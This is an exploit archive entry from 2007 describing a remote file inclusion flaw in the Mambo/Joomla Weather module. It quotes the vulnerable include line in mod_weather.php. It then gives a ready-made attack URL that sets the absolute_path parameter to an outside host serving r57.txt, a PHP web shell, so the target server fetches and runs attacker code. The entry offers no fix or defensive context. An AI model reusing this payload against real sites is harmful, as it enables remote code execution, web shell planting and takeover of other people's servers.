Mambo Module Weather (absolute_path) RFI Vulnerability

2007-04-11T00:00:00
ID 1337DAY-ID-1740
Type zdt
Reporter Cold Zero
Modified 2007-04-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================
Mambo Module Weather (absolute_path) RFI Vulnerability
======================================================



============================================================
Mambo/Joomla Module Weather (absolute_path) Remote File include Vuln
============================================================
Script :
http://www.joomlaos.de/option,com_remository/Itemid,41/func,download/id,47/chk,a39037e15bb5cd125f3cfd9dccaec6f5/no_html,1.html
============================================================
File : /mod_weather.php
include($absolute_path.'/language/'.$lang.'/lang_mod_weather.php');
============================================================
http://site/{path}/modules/mod_weather.php?absolute_path=http://nachrichtenmann.de/r57.txt?
============================================================



#  0day.today [2018-03-14]  #